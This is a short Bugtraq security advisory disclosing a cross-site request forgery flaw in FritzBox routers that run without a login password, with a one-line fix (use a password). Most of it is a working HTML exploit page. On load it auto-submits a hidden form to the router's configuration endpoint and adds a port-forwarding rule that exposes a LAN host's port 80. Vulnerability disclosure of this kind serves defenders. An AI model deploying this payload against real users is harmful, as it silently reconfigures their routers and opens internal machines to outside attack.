Bugtraq: FtitzBox

[biglowbird () googlemail com]

######################################
# Exploitation: Remote with browser
# Exploit: Available
# Impact: Medium
# Fix: N/A
######################################


####################
- Description:
####################
Via XSRF change settings in FritzBox.


####################
- Vulnerability:
####################
XSRF vulnerability, when you use the FritzBox without passwort login


####################
- example Exploit for Portforwarding:
####################
<html>
<body onLoad="javascript:document.form.submit()">
<form action="http://www.fritz.box/cgi-bin/webcm"; method="POST" name="form">
<input type="hidden" value="getpage" value="../html/de/menus/menu2.html">
<input type="hidden" name="errorpage" value="../html/de/menus/menu2.html">
<input type="hidden" name="var:lang" value="de">
<input type="hidden" name="var:pagename" value="portfw">
<input type="hidden" name="var:errorpagename" value="portrule">
<input type="hidden" name="var:menu" value="internet">
<input type="hidden" name="var:pagemaster" value="">
<input type="hidden" name="var:rule" value="rule3">
<input type="hidden" name="var:isnew" value="1">
<input type="hidden" name="var:isexp" value="0">
<input type="hidden" name="forwardrules:settings/rule3/activated" value="1">
<input type="hidden" name="forwardrules:settings/rule3/description" value="HTTP-Server">
<input type="hidden" name="forwardrules:settings/rule3/protocol" value="TCP">
<input type="hidden" name="forwardrules:settings/rule3/port" value="80">
<input type="hidden" name="forwardrules:settings/rule3/endport" value="80">
<input type="hidden" name="forwardrules:settings/rule3/fwip" value="192.168.178.24">
<input type="hidden" name="forwardrules:settings/rule3/fwport" value="80">
</form>
</body>
</html>

(this is only a example code for portforwarding for other things they are other variables!!!)

####################
- Solution:
####################
Use FritzBox only with passwort



thx to skskilL & NBBN